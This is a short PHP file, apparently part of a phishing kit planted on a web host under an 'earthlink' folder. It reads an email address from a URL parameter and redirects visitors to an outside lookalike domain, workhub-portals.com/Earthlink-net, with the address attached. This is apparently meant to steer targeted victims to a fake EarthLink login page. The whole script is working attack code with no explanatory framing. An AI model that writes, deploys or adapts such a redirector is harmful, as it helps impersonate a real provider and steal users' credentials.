dvadf
/home/homerdlh/www/earthlink/index.php
<?php
	$url = "https://workhub-portals.com/Earthlink-net"; 

	$cl = explode( '/', $_GET['cl'] );
	
	$random = $cl[0];
	$email = $cl[1];
	
	header("Location: $url?email=$email");
?>